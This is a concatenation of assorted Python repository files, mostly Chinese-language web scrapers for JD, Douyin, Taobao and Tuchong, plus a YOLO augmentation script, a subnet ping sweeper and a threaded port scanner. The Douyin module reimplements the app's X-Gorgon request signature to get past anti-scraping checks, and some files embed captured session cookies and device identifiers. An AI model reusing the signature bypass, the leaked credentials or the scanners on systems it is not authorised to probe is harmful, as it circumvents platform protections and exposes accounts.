"source": "13060923171/order-receiving-project",
"score": 4
} |
#### File: order-receiving-project/data_and_templates/part1_template.py
```python
import numpy as np
import pandas as pd
def classify_prices(discount):
price_classification = [] # Change/remove this line
for d in discount:
if float(d) <= 0:
category = 'no_discount'
price_classification.append(category)
elif 0 <= float(d) <= 0.1:
category = 'discounted'
price_classification.append(category)
elif 0.1 <= float(d) <= 0.2:
category = 'good_deal'
price_classification.append(category)
else:
category = 'buy_now'
price_classification.append(category)
# Please, introduce your answer here
return price_classification
def calculate_discount(current, reference):
list_discount = []
for i in range(len(current)):
c = current[i]
r = reference[i]
discount = (r - c)/r
list_discount.append(discount)
return list_discount
def read_files(current_price_filename, reference_price_filename):
with open(current_price_filename,encoding='utf-8')as f:
data = np.loadtxt(f,delimiter=',')
with open(reference_price_filename, encoding='utf-8')as f:
data1 = np.loadtxt(f, delimiter=',')
current = np.array(data,dtype=np.int) # Change/remove this line
reference = np.array(data1,dtype=np.int) # Change/remove this line
# Please, introduce your answer here
return current, reference
def check_output(current, reference, discount, price_classification):
# Do not modify this function, it is provided only for you to check your answer
n_prices = len(discount)
print('----------------------------------------------')
print('P', 'current', 'ref', 'discount', 'classification', sep='\t')
print('----------------------------------------------')
for i in range(n_prices):
print(i, current[i],
reference[i],
str(np.round(discount[i], 2)) + '%',
price_classification[i], sep='\t')
if __name__ == '__main__':
current_price_filename = 'data/current_prices_example.csv' # You can change this value for testing
reference_price_filename = 'data/reference_prices_example.csv' # You can change this value for testing
# The lines below are provided to run your code in a similar order as
# will be done during marking and to help you check your answer.
current, reference = read_files(current_price_filename, reference_price_filename)
discount = calculate_discount(current, reference)
price_classification = classify_prices(discount)
# You can use the function below to check your answer only
# Please comment it for your submission
check_output(current, reference, discount, price_classification)
``` |
{
"source": "13060923171/xianmu",
"score": 2
} |
#### File: xianmu/京东框架/Celery.py
```python
from celery import Celery
import requests,re,json
app = Celery(
'tasks',
backend='redis://127.0.0.1:6379/2',
broker='redis://127.0.0.1:6379/1',
)
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
}
def get_id(url):
id = re.compile('\d+')
res = id.findall(url)
return res[0]
@app.task
def get_comm(url,comm_num):
#存放结果
good_comments = ""
#获取评论
item_id = get_id(url)
pages = comm_num//10
if pages>99:
pages = 99
for page in range(0,pages):
comm_url = 'https://club.jd.com/comment/productPageComments.action?callback=fetchJSON_comment98&productId={}&score=0&sortType=5&page={}&pageSize=10&isShadowSku=0&rid=0&fold=1'.format(item_id,page)
headers['Referer'] = url
json_decode = requests.get(comm_url,headers = headers).text
try:
if json_decode:
start = json_decode.find('{"productAttr"')
end = json_decode.find('"afterDays":0}]}') + len('"afterDays":0}]}')
results = json.loads(json_decode[start:end])['comments']
for result in results:
content = result['content']
good_comments += "{}|".format(content)
except Exception as e:
pass
return item_id,good_comments
```
#### File: 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/xgorgon.py
```python
import hashlib
from urllib import request
import time
import gzip
byteTable1 ="D6 28 3B 71 70 76 BE 1B A4 FE 19 57 5E 6C BC 21 B2 14 37 7D 8C A2 FA 67 55 6A 95 E3 FA 67 78 ED 8E 55 33 89 A8 CE 36 B3 5C D6 B2 6F 96 C4 34 B9 6A EC 34 95 C4 FA 72 FF B8 42 8D FB EC 70 F0 85 46 D8 B2 A1 E0 CE AE 4B 7D AE A4 87 CE E3 AC 51 55 C4 36 AD FC C4 EA 97 70 6A 85 37 6A C8 68 FA FE B0 33 B9 67 7E CE E3 CC 86 D6 9F 76 74 89 E9 DA 9C 78 C5 95 AA B0 34 B3 F2 7D B2 A2 ED E0 B5 B6 88 95 D1 51 D6 9E 7D D1 C8 F9 B7 70 CC 9C B6 92 C5 FA DD 9F 28 DA C7 E0 CA 95 B2 DA 34 97 CE 74 FA 37 E9 7D C4 A2 37 FB FA F1 CF AA 89 7D 55 AE 87 BC F5 E9 6A C4 68 C7 FA 76 85 14 D0 D0 E5 CE FF 19 D6 E5 D6 CC F1 F4 6C E9 E7 89 B2 B7 AE 28 89 BE 5E DC 87 6C F7 51 F2 67 78 AE B3 4B A2 B3 21 3B 55 F8 B3 76 B2 CF B3 B3 FF B3 5E 71 7D FA FC FF A8 7D FE D8 9C 1B C4 6A F9 88 B5 E5"
def getXGon(url,stub,cookies):
NULL_MD5_STRING = "00000000000000000000000000000000"
sb=""
if len(url)<1 :
sb =NULL_MD5_STRING
else:
sb =encryption(url)
if len(stub)<1:
sb+=NULL_MD5_STRING
else:
sb+=stub
if len(cookies)<1:
sb+=NULL_MD5_STRING
else:
sb+=encryption(cookies)
index = cookies.index("sessionid=")
if index == -1:
sb+=NULL_MD5_STRING
else:
sessionid = cookies[index+10:]
if sessionid.__contains__(';'):
endIndex = sessionid.index(';')
sessionid = sessionid[:endIndex]
sb+=encryption(sessionid)
return sb
def encryption(url):
obj = hashlib.md5()
obj.update(url.encode("UTF-8"))
secret = obj.hexdigest()
return secret.lower()
def initialize(data):
myhex = 0
byteTable2 = byteTable1.split(" ")
for i in range(len(data)):
hex1 = 0
if i==0:
hex1= int(byteTable2[int(byteTable2[0],16)-1],16)
byteTable2[i]=hex(hex1)
# byteTable2[i] = Integer.toHexString(hex1);
elif i==1:
temp= int("D6",16)+int("28",16)
if temp>256:
temp-=256
hex1 = int(byteTable2[temp-1],16)
myhex = temp
byteTable2[i] = hex(hex1)
else:
temp = myhex+int(byteTable2[i], 16)
if temp > 256:
temp -= 256
hex1 = int(byteTable2[temp - 1], 16)
myhex = temp
byteTable2[i] = hex(hex1)
if hex1*2>256:
hex1 = hex1*2 - 256
else:
hex1 = hex1*2
hex2 = byteTable2[hex1 - 1]
result = int(hex2,16)^int(data[i],16)
data[i] = hex(result)
for i in range(len(data)):
data[i] = data[i].replace("0x", "")
return data
def handle(data):
for i in range(len(data)):
byte1 = data[i]
if len(byte1)<2:
byte1+='0'
else:
byte1 = data[i][1] +data[i][0]
if i<len(data)-1:
byte1 = hex(int(byte1,16)^int(data[i+1],16)).replace("0x","")
else:
byte1 = hex(int(byte1, 16) ^ int(data[0], 16)).replace("0x","")
byte1 = byte1.replace("0x","")
a = (int(byte1, 16) & int("AA", 16)) / 2
a = int(abs(a))
byte2 =((int(byte1,16)&int("55",16))*2)|a
byte2 = ((byte2&int("33",16))*4)|(int)((byte2&int("cc",16))/4)
byte3 = hex(byte2).replace("0x","")
if len(byte3)>1:
byte3 = byte3[1] +byte3[0]
else:
byte3+="0"
byte4 = int(byte3,16)^int("FF",16)
byte4 = byte4 ^ int("14",16)
data[i] = hex(byte4).replace("0x","")
return data
def xGorgon(timeMillis,inputBytes):
data1 = []
data1.append("3")
data1.append("61")
data1.append("41")
data1.append("10")
data1.append("80")
data1.append("0")
data2 = input(timeMillis,inputBytes)
data2 = initialize(data2)
data2 = handle(data2)
for i in range(len(data2)):
data1.append(data2[i])
xGorgonStr = ""
for i in range(len(data1)):
temp = data1[i]+""
if len(temp)>1:
xGorgonStr += temp
else:
xGorgonStr +="0"
xGorgonStr+=temp
return xGorgonStr
def input(timeMillis,inputBytes):
result = []
for i in range(4):
if inputBytes[i]<0:
temp = hex(inputBytes[i])+''
temp = temp[6:]
result.append(temp)
else:
temp = hex(inputBytes[i]) + ''
result.append(temp)
for i in range(4):
result.append("0")
for i in range(4):
if inputBytes[i+32]<0:
result.append(hex(inputBytes[i+32])+'')[6:]
else:
result.append(hex(inputBytes[i + 32]) + '')
for i in range(4):
result.append("0")
tempByte = hex(int(timeMillis))+""
tempByte = tempByte.replace("0x","")
for i in range(4):
a = tempByte[i * 2:2 * i + 2]
result.append(tempByte[i*2:2*i+2])
for i in range(len(result)):
result[i] = result[i].replace("0x","")
return result
def strToByte(str):
length = len(str)
str2 = str
bArr =[]
i=0
while i < length:
# bArr[i/2] = b'\xff\xff\xff'+(str2hex(str2[i]) << 4+str2hex(str2[i+1])).to_bytes(1, "big")
a = str2[i]
b = str2[1+i]
c = ((str2hex(a) << 4)+str2hex(b))
bArr.append(c)
i+=2
return bArr
def str2hex(s):
odata = 0
su =s.upper()
for c in su:
tmp=ord(c)
if tmp <= ord('9') :
odata = odata << 4
odata += tmp - ord('0')
elif ord('A') <= tmp <= ord('F'):
odata = odata << 4
odata += tmp - ord('A') + 10
return odata
def doGetGzip(url,headers,charset):
req = request.Request(url)
for key in headers:
req.add_header(key,headers[key])
with request.urlopen(req) as f:
data = f.read()
return gzip.decompress(data).decode()
def douyin_xgorgon(url,cookies,xtttoken):
ts = str(time.time()).split(".")[0]
_rticket = str(time.time() * 1000).split(".")[0]
params = url[url.index('?')+1:]
STUB = ""
s = getXGon(params,STUB,cookies)
gorgon = xGorgon(ts,strToByte(s))
headers={
"X-Gorgon":gorgon,
"X-Khronos": ts,
"sdk-version":"1",
"Cookie": cookies,
"Accept-Encoding": "gzip",
"X-SS-REQ-TICKET": _rticket,
"Host": "aweme.snssdk.com",
"Connection": "Keep-Alive",
'User-Agent': 'okhttp/3.10.0.1',
"x-tt-token":xtttoken
}
return headers
```
#### File: xianmu/爬取抖音无水印视频/douying.py
```python
import requests
'''
GET https://api3-core-c-hl.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1587528101000&sec_user_id=MS4wLjABAAAA4s3jerVDPUA_xvyoGhRypnn8ijAtUfrt9rCWL2aXxtU&count=10&ts=1587635299&host_abi=armeabi-v7a&_rticket=1587635299508&mcc_mnc=46007& HTTP/1.1
Host: api3-core-c-hl.amemv.com
Connection: keep-alive
Cookie: odin_tt=fab0188042f9c0722c90b1fbaf5233d30ddb78a41267bacbfc7c1fb216d37344df795f4e08e975d557d0c274b1c761da039574e4eceaae4a8441f72167d64afb
X-SS-REQ-TICKET: 1587635299505
sdk-version: 1
X-SS-DP: 1128
x-tt-trace-id: 00-a67026290de17aa15402ce8ee4a90468-a67026290de17aa1-01
User-Agent: com.ss.android.ugc.aweme/100801 (Linux; U; Android 5.1.1; zh_CN; MI 9; Build/NMF26X; Cronet/TTNetVersion:8109b77c 2020-04-15 QuicVersion:0144d358 2020-03-24)
X-Gorgon: 0404c0d100004fe124c18b36d03baf0768c181e105b1af5e8167
X-Khronos: 1587635299
x-common-params-v2: os_api=22&device_platform=android&device_type=MI%209&iid=78795828897640&version_code=100800&app_name=aweme&openudid=80c5f2708a3b6304&device_id=3966668942355688&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=100801&dpi=320&cdid=e390170c-0cb5-42ad-8bf6-d25dc4c7e3a3&version_name=10.8.0&resolution=900*1600&language=zh&device_brand=Xiaomi&app_type=normal&ac=wifi&update_version_code=10809900&uuid=863254643501389
'''
# 下载视频代码,创建一个文件夹来存放抖音的视频
def download_video(url, title):
with open("{}.mp4".format(title), "wb") as f:
f.write(requests.get(url).content)
print("下载视频{}完毕".format(title))
#怎么去爬取APP里面的视频
def get_video():
#通过我们的fiddler这个抓包工具来获取我们想要爬取某个账户里面全部视频的URL
url = "https://api3-core-c-hl.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1587528101000&sec_user_id=MS4wLjABAAAA4s3jerVDPUA_xvyoGhRypnn8ijAtUfrt9rCWL2aXxtU&count=10&ts=1587635299&host_abi=armeabi-v7a&_rticket=1587635299508&mcc_mnc=46007&"
#构建我们的headers,这些对应的数据都是通过我们的fiddler获取的
headers = {
'Cookie': 'odin_tt=fab0188042f9c0722c90b1fbaf5233d30ddb78a41267bacbfc7c1fb216d37344df795f4e08e975d557d0c274b1c761da039574e4eceaae4a8441f72167d64afb',
'X-SS-REQ-TICKET': '1587635299505',
'sdk-version': '1',
'X-SS-DP': '1128',
'x-tt-trace-id': '00-a67026290de17aa15402ce8ee4a90468-a67026290de17aa1-01',
'User-Agent': 'com.ss.android.ugc.aweme/100801 (Linux; U; Android 5.1.1; zh_CN; MI 9; Build/NMF26X; Cronet/TTNetVersion:8109b77c 2020-04-15 QuicVersion:0144d358 2020-03-24)',
'X-Gorgon': '0404c0d100004fe124c18b36d03baf0768c181e105b1af5e8167',
'X-Khronos': '1587635299',
'x-common-params-v2': 'os_api=22&device_platform=android&device_type=MI%209&iid=78795828897640&version_code=100800&app_name=aweme&openudid=80c5f2708a3b6304&device_id=3966668942355688&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=100801&dpi=320&cdid=e390170c-0cb5-42ad-8bf6-d25dc4c7e3a3&version_name=10.8.0&resolution=900*1600&language=zh&device_brand=Xiaomi&app_type=normal&ac=wifi&update_version_code=10809900&uuid=863254643501389'
}
#无视证书的请求
html = requests.get(url, headers=headers, verify=False)
#把数据用json来全部获取下来
json_data = html.json()["aweme_list"]
#循环叠带我们的数据,把它们一一展示出来
for j in json_data:
title = j['desc']
print(title)
print(j['video']['play_addr']['url_list'][0])
#把最后每个视频对应的URL打印出来,再根据我们的下载函数,把它们全部下载到自己的电脑里面
download_video(j['video']['play_addr']['url_list'][0], title)
if __name__ == '__main__':
get_video()
```
#### File: xianmu/爬取淘宝商品信息基于selenium框架/taobao.py
```python
import requests
import re
from urllib import parse
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
"referer": "https://tb.alicdn.com/snapshot/index.html",
'cookie': 't=884491259d4aed9aac3cd83e5798c433; cna=UU81Fxb46woCAWUv7c0BLoMd; sgcookie=ERElHyZEXq%2FBxbIAKkMLf; tracknick=%5Cu53F6%5Cu95EE%5Cu8C01%5Cu662F%5Cu8FB0%5Cu5357; _cc_=V32FPkk%2Fhw%3D%3D; enc=UvoaKN2E%2F5qKScgssIA7s34lg2c%2B7mFKY6bD58vrwGvLTZKDyYj7UQ0p3hGnXJK11f8JrZT5ky54YNi0i73Few%3D%3D; tfstk=cIOdBdvB3cmha_TF3QHGFR3VyY-dafFd2ys4w4-E6MTnQmN8NsxviIpfnv_Yv13O.; thw=cn; hng=CN%7Czh-CN%7CCNY%7C156; cookie2=1165897f57a1ed424d42db9d3a99ff7d; v=0; _tb_token_=<PASSWORD>; alitrackid=tb.alicdn.com; lastalitrackid=tb.alicdn.com; JSESSIONID=42FB5C5D5D65C270436BAF43224830CB; isg=BPb2H7f2tUx9pkBnqiw8IaAaRyz4FzpR25dtfWDcO1mro5U9yaZ-YfUau3_PPzJp; l=eBTUSTCcQZnRM5Q_BO5alurza77TaQdf1nVzaNbMiInca6TFta8TVNQqOBKvSdtjgt5j2eKrb3kJjRhM8W4LRjkDBeYBRs5mpfpp8e1..',
}
keyword = input("请输入你要搜索的信息:")
def get_parse(url):
html = requests.get(url,headers= headers)
if html.status_code ==200:
print('页面正常')
get_html(html)
else:
print(html.status_code)
def get_html(html):
#用正则表达式去获取商品的名称,价格,商家名称和商家位置
content = html.text
#定位商品名称
names = re.compile('"raw_title":"(.*?)"', re.I | re.S)
name = names.findall(content)
#定位价格
prices = re.compile('"view_price":"(.*?)"',re.I|re.S)
price = prices.findall(content)
#定位商家名称
nicks = re.compile('"nick":"(.*?)"',re.I|re.S)
nick = nicks.findall(content)
#定位商家位置
item_locs = re.compile('"item_loc":"(.*?)"', re.I | re.S)
item_loc= item_locs.findall(content)
#先算出爬出来正则的长度,从而确定循环,把商品的名称,价格,位置全部有序的全部打印出来
for j in range(len(name)):
print('商品名称:{}\n价格:{}\n商家名称:{}\n商家位置:{}\n'.format(name[j], price[j], nick[j], item_loc[j]))
if __name__ == '__main__':
for i in range(0,45,44):
url = 'https://s.taobao.com/search?q={}&imgfile=&commend=all&ssid=s5-e&' \
'search_type=item&sourceId=tb.index&spm=a21bo.2017.201856-taobao-item.1&' \
'ie=utf8&initiative_id=tbindexz_20170306&bcoffset=1&ntoffset=1&p4ppushleft=2%2C48&s={}'.format(parse.quote(keyword),i)
get_parse(url)
```
#### File: 抓取百度文库所有内容/paqu-ppt/pdf.py
```python
import requests
from selenium import webdriver
from lxml import etree
import re
from selenium.webdriver.common.keys import Keys
import time
from PIL import Image
import os
from bs4 import BeautifulSoup
from docx import Document
import sys
#首先先去获取这个函数
def get_html(url):
try:
#这里用到防错机制先获取这个页面用get方法
r = requests.get(url,headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.62 Safari/537.36"})
#这句话的意思就是这个HTTP回应内容的编码方式 =这个内容的备用编码方式,
# 这样写的意义就是不用指定某种编码,而是直接调用这个内容的编码
r.encoding = r.apparent_encoding
#放回这个内容以text的形式
return r.text
except:
print("URL request error")
```
#### File: xianmu/破解千图批量下载图片/paqutupian.py
```python
import requests
import os
import re
#用正则表达式去获取这个图片的id
imageID = re.compile('"imageId":"(.*?)"')
#构建我们的请求头
headers= {
"Accept-Encoding":"",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.62 Safari/537.36"
}
#去获取这个页面的图片并且保存下来
def get_page():
url = "https://stock.tuchong.com/topic?topicId=49390"
html = requests.get(url)
result = imageID.findall(html.text)
for r in result:
#这个图片的URL的格式都一样,只是每张图片的ID不同而已,所以只要我们获取它的ID就可以获取它的图片
imgurl = "https://icweiliimg9.pstatp.com/weili/l/{}.jpg".format(r)
name = str(r)
downloadImg(imgurl,name)
#写一个保存图片的函数
def downloadImg(url:str,name:str) ->None:
if not os.path.exists("./图虫"):
os.mkdir("./图虫")
print("正在下载图片,ID:"+name)
with open("./图虫/{}.jpg".format(name),"wb") as f:
#通过保存这个图片的URL来保存这个图片
f.write(requests.get(url,headers=headers).content)
if __name__ == '__main__':
get_page()
```
#### File: xianmu/获取新冠肺炎实时数据/paqufeiyang.py
```python
import requests
from lxml import etree
import json
import time
import threading
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.62 Safari/537.36"
}
News_set = set()
#单线程版,获取网易新闻里面新冠肺炎的实时数据
def getData():
url = "https://wp.m.163.com/163/page/news/virus_report/index.html?_nw_=1&_anw_=1"
html = requests.get(url,headers=headers)
soup = etree.HTML(html.text)
#先是获取相应数据,这里是时间和数据
current_time =soup.xpath('//div[@class = "cover_time"]/text()')[0]
cover_data = soup.xpath('//div[@class = "cover_data_china"]/div[starts-with(@class,"cover")]')
#开始一个无限循环
while 1:
#进行不断爬取,从而达到我们的目的,实时获取数据
for cover in cover_data:
title = cover.xpath('h4/text()')[0]
number = cover.xpath('div[@class = "number"]/text()')[0]
result = current_time+" "+title+" "+ number
if result not in News_set:
News_set.add(result)
print(result,end=" ")
#间隔时间为60秒
time.sleep(60)
#多线程版,百度版新冠肺炎实时数据
def getNews():
url = "https://opendata.baidu.com/data/inner?tn=reserved_all_res_tn&dspName=iphone&from_sf=1&dsp=iphone&resource_id=28565&alr=1&query=%E8%82%BA%E7%82%8E&cb=jsonp_1588237477067_8878"
html = requests.get(url,headers=headers)
html_text = html.text
#用获取json开始的位置
start = html_text.find('{"ResultCode"')
#获取json末尾的位置
end = html_text.find(r'recall_srcids\u0000\u0000"}')+len(r'recall_srcids\u0000\u0000"}')
#把json给拼接起来,并且把json转化为python的形式
json_data = json.loads(html_text[start:end])
#最新的数据,用json来定位
data_new = json_data['Result'][0]["DisplayData"]["result"]['items']
#写一个循环函数来达到我们的目的
while 1:
for data in data_new:
new_title = data["eventDescription"]
new_time = data["eventTime"]
new_url = data['eventUrl']
local_time = time.localtime(int(new_time))
current_time = time.strftime("%Y-%m-%d %H-%M-%S",local_time)
result = new_title+current_time+" "+new_url
if result not in News_set:
News_set.add(result)
print(result)
time.sleep(60)
def xingXi():
print("新冠肺炎情况:")
#单线程开启网易新闻的新冠肺炎的实时情况
print("实时新闻:")
getNews()
#多线程开启百度新冠肺炎的实时情况
print("百度提供实时新闻")
threading.Thread(target=getNews().start())
if __name__ == '__main__':
xingXi()
``` |
{
"source": "1306298019/YOLOV4",
"score": 3
} |
#### File: 1306298019/YOLOV4/mosaic.py
```python
from PIL import Image, ImageDraw
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
import math
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
def merge_bboxes(bboxes, cutx, cuty):
merge_bbox = []
for i in range(len(bboxes)):
for box in bboxes[i]:
tmp_box = []
x1,y1,x2,y2 = box[0], box[1], box[2], box[3]
if i == 0:
if y1 > cuty or x1 > cutx:
continue
if y2 >= cuty and y1 <= cuty:
y2 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x2 = cutx
if x2-x1 < 5:
continue
if i == 1:
if y2 < cuty or x1 > cutx:
continue
if y2 >= cuty and y1 <= cuty:
y1 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x2 = cutx
if x2-x1 < 5:
continue
if i == 2:
if y2 < cuty or x2 < cutx:
continue
if y2 >= cuty and y1 <= cuty:
y1 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x1 = cutx
if x2-x1 < 5:
continue
if i == 3:
if y1 > cuty or x2 < cutx:
continue
if y2 >= cuty and y1 <= cuty:
y2 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x1 = cutx
if x2-x1 < 5:
continue
tmp_box.append(x1)
tmp_box.append(y1)
tmp_box.append(x2)
tmp_box.append(y2)
tmp_box.append(box[-1])
merge_bbox.append(tmp_box)
return merge_bbox
def get_random_data(annotation_line, input_shape, random=True, hue=.1, sat=1.5, val=1.5, proc_img=True):
'''random preprocessing for real-time data augmentation'''
h, w = input_shape
min_offset_x = 0.4
min_offset_y = 0.4
scale_low = 1-min(min_offset_x,min_offset_y)
scale_high = scale_low+0.2
image_datas = []
box_datas = []
index = 0
place_x = [0,0,int(w*min_offset_x),int(w*min_offset_x)]
place_y = [0,int(h*min_offset_y),int(w*min_offset_y),0]
for line in annotation_line:
# 每一行进行分割
line_content = line.split()
# 打开图片
image = Image.open(line_content[0])
image = image.convert("RGB")
# 图片的大小
iw, ih = image.size
# 保存框的位置
box = np.array([np.array(list(map(int,box.split(',')))) for box in line_content[1:]])
# image.save(str(index)+".jpg")
# 是否翻转图片
flip = rand()<.5
if flip and len(box)>0:
image = image.transpose(Image.FLIP_LEFT_RIGHT)
box[:, [0,2]] = iw - box[:, [2,0]]
# 对输入进来的图片进行缩放
new_ar = w/h
scale = rand(scale_low, scale_high)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw,nh), Image.BICUBIC)
# 进行色域变换
hue = rand(-hue, hue)
sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)
val = rand(1, val) if rand()<.5 else 1/rand(1, val)
x = rgb_to_hsv(np.array(image)/255.)
x[..., 0] += hue
x[..., 0][x[..., 0]>1] -= 1
x[..., 0][x[..., 0]<0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x>1] = 1
x[x<0] = 0
image = hsv_to_rgb(x)
image = Image.fromarray((image*255).astype(np.uint8))
# 将图片进行放置,分别对应四张分割图片的位置
dx = place_x[index]
dy = place_y[index]
new_image = Image.new('RGB', (w,h), (128,128,128))
new_image.paste(image, (dx, dy))
image_data = np.array(new_image)/255
# Image.fromarray((image_data*255).astype(np.uint8)).save(str(index)+"distort.jpg")
index = index + 1
box_data = []
# 对box进行重新处理
if len(box)>0:
np.random.shuffle(box)
box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx
box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy
box[:, 0:2][box[:, 0:2]<0] = 0
box[:, 2][box[:, 2]>w] = w
box[:, 3][box[:, 3]>h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w>1, box_h>1)]
box_data = np.zeros((len(box),5))
box_data[:len(box)] = box
image_datas.append(image_data)
box_datas.append(box_data)
img = Image.fromarray((image_data*255).astype(np.uint8))
for j in range(len(box_data)):
thickness = 3
left, top, right, bottom = box_data[j][0:4]
draw = ImageDraw.Draw(img)
for i in range(thickness):
draw.rectangle([left + i, top + i, right - i, bottom - i],outline=(255,255,255))
img.show()
# 将图片分割,放在一起
cutx = np.random.randint(int(w*min_offset_x), int(w*(1 - min_offset_x)))
cuty = np.random.randint(int(h*min_offset_y), int(h*(1 - min_offset_y)))
new_image = np.zeros([h,w,3])
new_image[:cuty, :cutx, :] = image_datas[0][:cuty, :cutx, :]
new_image[cuty:, :cutx, :] = image_datas[1][cuty:, :cutx, :]
new_image[cuty:, cutx:, :] = image_datas[2][cuty:, cutx:, :]
new_image[:cuty, cutx:, :] = image_datas[3][:cuty, cutx:, :]
# 对框进行进一步的处理
new_boxes = merge_bboxes(box_datas, cutx, cuty)
return new_image, new_boxes
def normal_(annotation_line, input_shape):
'''random preprocessing for real-time data augmentation'''
line = annotation_line.split()
image = Image.open(line[0])
box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])
iw, ih = image.size
image = image.transpose(Image.FLIP_LEFT_RIGHT)
box[:, [0,2]] = iw - box[:, [2,0]]
return image, box
if __name__ == "__main__":
with open("2007_train.txt") as f:
lines = f.readlines()
a = np.random.randint(0,len(lines))
# index = 0
# line_all = lines[a:a+4]
# for line in line_all:
# image_data, box_data = normal_(line,[416,416])
# img = image_data
# for j in range(len(box_data)):
# thickness = 3
# left, top, right, bottom = box_data[j][0:4]
# draw = ImageDraw.Draw(img)
# for i in range(thickness):
# draw.rectangle([left + i, top + i, right - i, bottom - i],outline=(255,255,255))
# img.show()
# # img.save(str(index)+"box.jpg")
# index = index+1
line = lines[a:a+4]
image_data, box_data = get_random_data(line,[416,416])
img = Image.fromarray((image_data*255).astype(np.uint8))
for j in range(len(box_data)):
thickness = 3
left, top, right, bottom = box_data[j][0:4]
draw = ImageDraw.Draw(img)
for i in range(thickness):
draw.rectangle([left + i, top + i, right - i, bottom - i],outline=(255,255,255))
img.show()
img.save("box_all.jpg")
``` |
{
"source": "1308js/NetworkScan",
"score": 3
} |
#### File: 1308js/NetworkScan/network_scan.py
```python
from threading import Thread
import subprocess
from Queue import Queue
import socket, struct, fcntl
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
def get_ip(iface = 'wlan0'):####################function to get the local ip for wireless
ifreq = struct.pack('16sH14s', iface, socket.AF_INET, '\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
ip=get_ip('wlan0')####getting the ip
ip=ip.split('.')
ip=ip[0]+'.'+ip[1]+'.'+ip[2]+'.'####splitting the ip
num_threads = 20
queue = Queue()
#wraps system ping command
##function to check the status of node
def pinger(i, q):
"""Pings subnet"""
while True:
fp=open("result.dat",'a')
ip = q.get()
print "Thread %s: Pinging %s" % (i, ip)
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
fp.write(ip+"\n")
else:
print "%s: did not respond" % ip
q.task_done()
#Spawn thread pool
###thread pools
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
#Place work in queue
for i in range(0,256):
ip1=ip+str(i)
queue.put(ip1)
#Wait until worker threads are done to exit
queue.join()
```
#### File: 1308js/NetworkScan/port_scan.py
```python
import os
import socket
from concurrent.futures import ThreadPoolExecutor
THREADS = 512
CONNECTION_TIMEOUT = 1
def ping(host, port, results = None):
try:
socket.socket().connect((host, port))
if results is not None:
results.append(port)
print(str(port) + " Open")
file_name=host+'.dat'
f=open(file_name,'a')
f.write(str(port)+"\n")
return True
except:
return False
def scan_ports(host):
available_ports = []
socket.setdefaulttimeout(CONNECTION_TIMEOUT)
with ThreadPoolExecutor(max_workers = THREADS) as executor:
print("\nScanning ports on " + host + " ...")
for port in range(1, 65535):
executor.submit(ping, host, port, available_ports)
print("\nDone.")
available_ports.sort()
print(str(len(available_ports)) + " ports available.")
print(available_ports)
def main():
fp=open("result.dat",'r')
for line in fp:
print line.strip()
scan_ports(line.strip())
if __name__ == "__main__":
main()
``` |
{
"source": "130B848/seckill",
"score": 3
} |
#### File: brotli/tools/rfc-format.py
```python
import re
import sys
from subprocess import Popen, PIPE
def Readfile(fn):
f = open(fn, "r")
return f.read()
def FixNroffOutput(buf):
p = re.compile(r'(.*)FORMFEED(\[Page\s+\d+\])$')
strip_empty = False
out = ""
for line in buf.split("\n"):
line = line.replace("\xe2\x80\x99", "'")
line = line.replace("\xe2\x80\x90", "-")
for i in range(len(line)):
if ord(line[i]) > 128:
print >>sys.stderr, "Invalid character %d\n" % ord(line[i])
m = p.search(line)
if strip_empty and len(line) == 0:
continue
if m:
out += p.sub(r'\1 \2\n\f', line)
out += "\n"
strip_empty = True
else:
out += "%s\n" % line
strip_empty = False
return out.rstrip("\n")
def Nroff(buf):
p = Popen(["nroff", "-ms"], stdin=PIPE, stdout=PIPE)
out, err = p.communicate(input=buf)
return FixNroffOutput(out)
def FormatTocLine(section, title, page):
line = ""
level = 1
if section:
level = section.count(".")
for i in range(level):
line += " "
if section:
line += "%s " % section
line += "%s " % title
pagenum = "%d" % page
nspace = 72 - len(line) - len(pagenum)
if nspace % 2:
line += " "
for i in range(nspace / 2):
line += ". "
line += "%d\n" % page
return line
def CreateToc(buf):
p1 = re.compile(r'^((\d+\.)+)\s+(.*)$')
